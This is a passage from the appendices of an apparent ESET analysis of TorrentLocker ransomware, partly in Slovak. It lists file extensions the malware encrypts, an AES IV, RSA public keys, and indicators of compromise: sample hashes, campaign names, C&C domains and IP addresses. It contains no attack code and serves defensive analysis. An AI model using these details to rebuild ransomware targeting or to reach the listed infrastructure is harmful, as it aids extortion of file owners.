nx2
nyf
odb
odf
odg
odm
odp
ods
odt
orf
otg
oth
otp
ots
ott
p12
p7b
p7c
pat
pcd
pef
pem
pfx
php
pl
pot
potm
potx
ppam
pps
ppsm
ppsx
ppt
pptm
pptx
ps
psafe3
psd
ptx
py
ra2
raf
rar
raw
rdb
rtf
rw2
rwl
rwz
s3db
sas7bdat
sav
sd0
sd1
sda
sdf
sldm
sldx
sql
sqlite
sqlite3
sqlitedb
sr2
srf
srw
st4
st5
st6
st7
st8
stc
std
sti
stw
stx
sxc
sxd
sxg
sxi
sxm
sxw
txt
wb2
x3f
xla
xlam
xll
xlm
xls
xlsb
xlsm
xlsx
xlt
xltm
xltx
xlw
xml
ycbcra
zip
40
TorrentLocker
Príloha F: Zoznam zakódovaných kľúčovIV, ktoré TorrentLocker používa pri používaní AES-256
AB 27 21 50 A1 D3 8D 37 FC C6 47 D4 89 39 57 49
Verejný kľúč RSA (2048 bitov)
-----BEGIN PUBLIC KEY-----MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAyOBVMkkMLK/iHPwiuSfdX2lhgZH0BqAPoYx/2r87Vluc1BUYqFOKLTiCXwLZ8a5FxqaMWwlbHQgnKquEU2jP/Dp90QYnpm76QPT2G8SrbbydC7CXbkBTHrvO9OJhMuKsNqHiCir0vaqw4GDebq+4pvL9cnB221SvK6DEgYfW0A/y/LSMJJoVovqG4IKKYj64AU4vFl9UMxmkv8lkXGyhPr01zhQgP2FEMRGqaoiGwRT9BZr/wnqQKjx9jSgEsKsCWcm7WX01YhjklE15+5P2RYUxlUsprnGZAA6gxcDcr4IxgS/FVf1XhG6lZXK40aoL5nDjFb+3b01YFQegsgOXbQIDAQAB-----END PUBLIC KEY-----
RSA public key used in early 2014 (2048 bits)
-----BEGIN PUBLIC KEY-----MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAmwKoS7h5X8m7KLugQUG7xVPrGFKQBY+2TPsr457Z6PsR4yGeTi/Lwt2OBXtMCAkMkea9IpHNsMvkUV94qWHYdJHiRkpW529FRS51lRrpeakFLsMjVG5d4OxLg55poQF4VfEdo3GrRK4NBh6ZW1O5dRv8lH9GuelrxxaCBswlepdjvpq3tNgkkZlUmcOw3ZnPOM/9lUfXmtJrqRb0biIA99pPMSxFqHKoTyMZRKOtZyd95tFqeSBZW1+l8W4EvAp2nOpRNbLsG68MZlzSMABwXXyMgqvnbN7iQuOjISfa5NlXZKiW5PBjgK0mfm2Ta5Kqu4QChNhbbVpsRfirui/apwIDAQAB-----END PUBLIC KEY-----
41
TorrentLocker
Príloha G: Zoznam príkladov
SHA-1 hash Dátum zostavenia PE
Kampaň C&C server IP adresa Názov detekcie ESET
CF13A9010F9B2FF7B4D15F6E90D73795D10B109F 2014-10-17 11:27:07
ad-a lebanonwarrior.ru 46.161.30.19 Win32/Filecoder.NCM
5E15FA63776AF696502CE98880E716858ED137EA 2014-11-06 15:54:14
ad-a deadwalk32.ru 46.161.30.21 Win32/Filecoder.DI
D6B7C7AFF06D84C4F8B7BC402517FBDC087D3EC2 2014-11-06 15:54:14
ad-a deadwalk32.ru 46.161.30.21 Win32/Filecoder.DI
23F017017EF3B8D2DECC832B9480F75E4D494C78 2014-09-22 13:44:09
ad-a tweeterplanet.ru 46.161.30.22 Win32/Filecoder.DI
85717A638F5A3CC62B2F5E25897FCEE997F35070 2014-11-02 12:37:08
ad-x deadwalk32.ru 46.161.30.21 Win32/Filecoder.DI
26F676D0A6A0057FE6AA35A0D025C478D8E05741 2014-11-05 15:44:47
ad-x ssl-server24.ru 46.161.30.21 Win32/Filecoder.DI
C51F28A9CEB78A3920A766874DC1B4601F1BA443 2014-11-05 15:44:47
ad-x ssl-server24.ru 46.161.30.21 Win32/Filecoder.DI
EB2EAE4CC2A5C7356B4E00C0F3D44788C4AE27E0 2014-11-05 15:44:47
ad-x ssl-server24.ru 46.161.30.21 Win32/Filecoder.DI
C7300DB3E475DA75DC76F490F6AF66680195BFB3 2014-10-15 03:51:14
ad-x octoberpics.ru 46.161.30.20 Win32/Filecoder.DI
F4555999389847DE8894DA26F7857145C9161009 2014-10-03 08:04:06
ad-x casinoroyal7.ru 46.161.30.20 Win32/Filecoder.NCM
E984C551B479B25401269712CC33379E5CA4592A 2014-10-22 13:42:02
ad-x deadwalk32.ru 46.161.30.21 Win32/Filecoder.DI
152B6EC0BDA40347968C560F370E8F2089CB0436 2014-09-25 16:01:53
ad-x octoberpics.ru 46.161.30.20 Win32/Filecoder.DI
94A24BE60D90479CE27F7787A86678472AABDC6E 2014-09-25 16:01:53
ad-x octoberpics.ru 46.161.30.20 Win32/Filecoder.DI
40B1D84B341BAE23DC5CFA8DD1C44CF96294CD54 2014-10-03 15:49:10
ad-x casinoroyal7.ru 46.161.30.20 Win32/Filecoder.DI
0F9EC608413918ADEF409E8E97612B6E71FD1BC7 2014-11-04 05:00:49
ad-x allwayshappy.ru 46.161.30.19 Win32/Filecoder.DI
66567121269F253F0282ECC04AD981DAE54959D9 2014-11-05 15:44:47
ad-x tweeterplanet.ru 46.161.30.22 Win32/Filecoder.DI
FAF92D3340613A28C16E09A333BFBC51637BB7BE 2014-11-05 15:44:47
main ssl-server24.ru 46.161.30.21 Win32/Filecoder.DI
642F9BE91ECB4575C833EA62F5AC1C5AEB28D7C1 2014-10-14 08:17:23
main octoberpics.ru 46.161.30.20 Win32/Filecoder.DI
DB3F0D4236ED3E802A8644D9EAAF6CF2D5F41535 2014-10-03 15:49:10
main casinoroyal7.ru 46.161.30.20 Win32/Filecoder.NCM
C7513FD55B8C28E70C4DF60E30211B24B0583F48 2014-10-14 05:18:28
main octoberpics.ru 46.161.30.20 Win32/Filecoder.DI
AB0C02449CA6166A455B2A64946AF1D466C1FF36 2014-09-25 16:01:53
main octoberpics.ru 46.161.30.20 Win32/Filecoder.DI
C7C74E59E23E3C5CB38F77DE2A60C36F12554F81 2014-09-25 16:01:53
main octoberpics.ru 46.161.30.20 Win32/Filecoder.DI
8CC606B19DACE148D39E65B9A1F2689D83D0C35A 2014-09-25 16:01:53
main casinoroyal7.ru 46.161.30.20 Win32/Filecoder.DI
642F9BE91ECB4575C833EA62F5AC1C5AEB28D7C1 2014-11-14 08:17:23
main octoberpics.ru 46.161.30.20 Win32/Filecoder.DI
45EF4DB9CD154F16E029491B375D1808FCC2E27E 2014-11-05 15:44:47
main ssl-server24.ru 46.161.30.21 Win32/Filecoder.DI
42
TorrentLocker
SHA-1 hash Dátum zostavenia PE
Kampaň C&C server IP adresa Názov detekcie ESET
EEF08716315B7FD1FA3B530D1EBCB8BD6FB06FD6 2014-11-08 15:10:14
main updatemyhost.ru 46.161.30.23 Win32/Filecoder.DI
BF55818A2E2391AB38031584B54281E01DB7D84B 2014-10-22 13:42:02
main deadwalk32.ru 46.161.30.21 Win32/Filecoder.DI
1B0C1051A9FB14B6A55772807823EF110EBB4E64 2014-11-13 08:34:27
main-2 walkingdead32.ru 46.161.30.17 Win32/Filecoder.DI
BCC86AF56CC0E22D99D1ECDBEFD8DA0AA7D1F573 2014-11-08 15:10:14
main-3 tweeterplanet.ru 46.161.30.22 Win32/Filecoder.DI
3FC94FE89220158E0B88F51D0A89C6452CE9F971 2014-10-29 09:06:08
test lebanonwarrior.ru 46.161.30.19 Win32/Filecoder.NCM
D84CF718BCD0D723B0AD157D50BE516B7328FBBA 2014-10-22 13:42:02
test allwayshappy.ru 46.161.30.19 Win32/Filecoder.NCM
28849D47A766C1FB014615CB3C1DD7888E545108 2014-11-03 03:20:08
test allwayshappy.ru 46.161.30.19 Win32/Filecoder.DI
F8E392229D87827AEF0C6EF4372E08B3E97BCF50 2014-09-16 06:59:32
main-botnet
Win32/Filecoder.DI
1697BCE98EAC21295B377E30B5C47475EF8A37352014-09-17 06:07:00
main-botnet
lagosadventures.com
46.149.111.176 Win32/Filecoder.DI
2492BA84B8CE83EEFAB541867217DE2CD6B1F637 2014-09-18 07:28:54
main-botnet
lagosadventures.com
46.149.111.176 Win32/Filecoder.DI
ACADFDED11C5F60FBB3A9621DF8738A0EA35525E 2014-09-19 03:46:34
main-botnet
lagosadventures.com
46.149.111.176 Win32/Filecoder.DI
82708C2ECEA9B03A01ED0F76D891A277F1870994 2014-09-12 14:01:43
main-botnet
princeofnigeria.net 46.149.111.184 Win32/Filecoder.DI
5542C3B82FA3D00AE3B2AC06E30C8616F827AFB5 2014-09-19 12:05:03
main-botnet
doubleclickads.net 31.31.203.149 Win32/Filecoder.DI
F4EDFFC6F90AC8CBC3C0E085231D57C5E2D52A2A 2014-09-29 14:34:16
main-test-botnet
js-static.ru 46.161.30.16 Win32/Filecoder.DI
466A2FA91D5039C50DECCDC50E27170650A4E139 2014-09-22 15:10:57
main-test-botnet
js-static.ru 46.161.30.16 Win32/Filecoder.DI
DD6F0307B269790062BE5282EF5BF9AC10577D69 2014-09-29 14:34:16
main-test-botnet-2
js-static.ru 46.161.30.16 Win32/Filecoder.DI
5DC1B4FDD8A4C6FA14D16AF5B77F8420374FF475 2014-09-29 14:34:16
main-test-botnet-2
server4love.ru 46.161.30.16 Win32/Filecoder.DI
FD0D0E7793A70BA230B74E4890A3097561225645 2014-09-25 16:01:53
main-test-botnet-2
server4love.ru 46.161.30.16 Win32/Filecoder.DI
456CE546A87856AE7E39CDDBB6E6BD061DE7DACF 2014-09-25 16:01:53
test-botnet-3
js-static.ru 46.161.30.16 Win32/Filecoder.DI
3CFA32C0AEBDCD8B4BF16A21C15AA4E52C778D05 2014-09-29 14:34:16
test-botnet-3
js-static.ru 46.161.30.16 Win32/Filecoder.DI
8D0AAFEE1CABE7B6CC0CAF93FFAFD3DA3BFF8B9B 2014-09-25 16:01:53
test-botnet-3
server4love.ru 46.161.30.16 Win32/Filecoder.DI
2CB050501273F3F102A354FE8F69EECDA61E6B12 2014-09-22 15:10:57
test-botnet-3
tweeter-stat.ru 46.161.30.16 Win32/Filecoder.DI
FAAE061FF1785D5922A873E16392ABF043B86F20 2014-09-25 16:01:53
test-botnet-3
js-static.ru 46.161.30.16 Win32/Filecoder.DI
4D091A1D511DA20715B91FE2038BEC380F088375 2014-09-22 13:54:00
test-2-botnet
nigerianbrothers.net 46.161.30.16 Win32/Filecoder.DI
EE6CF1E4649770AF5794B5B398064F30844E9D08 2014-11-08 15:10:14
tweeterplanet.ru 46.161.30.22 Win32/Filecoder.DI
43
TorrentLocker
SHA-1 hash Dátum zostavenia PE
Kampaň C&C server IP adresa Názov detekcie ESET
92E5139B2949880BC4CC268E741019A72665E4BB 2014-11-05 15:44:47
it-newsblog.ru 46.161.30.25 Win32/Filecoder.DI
AC63AB147F81E9476A9E50E85086F1744AB47A7F 2014-09-04 10:05:33
lebanonwarrior.ru 46.161.30.19 Win32/Filecoder.NCM
7C84B6CD0A2F50F74522FBCCED39D5E85AB45389 2014-11-05 15:44:47
walkingdead32.ru 46.161.30.17 Win32/Filecoder.DI
7F9B1FE4E3FCDD396B2C25E11D677AD90B23B332 2014-11-14 15:21:47
tweeterplanet.ru 46.161.30.22 Win32/Filecoder.DI
BAB725FBFA365B520D8D544388DF8F31D38864FD 2014-11-05 15:44:47
it-newsblog.ru 46.161.30.25 Win32/Filecoder.DI
F62084C0298E4050D608DBFD22C6BB0423708322 2014-08-29 04:03:12
server38.info 46.149.111.182 Win32/Filecoder.DI
8C22F2457DEBD9E44ADB212C902CA50B63986E01 2014-09-02 07:10:54
worldnews247.net 46.149.111.176 Win32/Filecoder.DI
F4D7DC1A7E2514801C1EDD33DB151FE5AEA1C18A 2014-02-10 12:58:06
cryptdomain.dp.ua 37.228.88.167 Win32/Filecoder.NBI
D299B3AB71E13BE64D6039647D1186735E4EB5E8 2014-05-15 13:01:06
royalgourp.org 151.248.118.193 Win32/Filecoder.NBS
44
TorrentLocker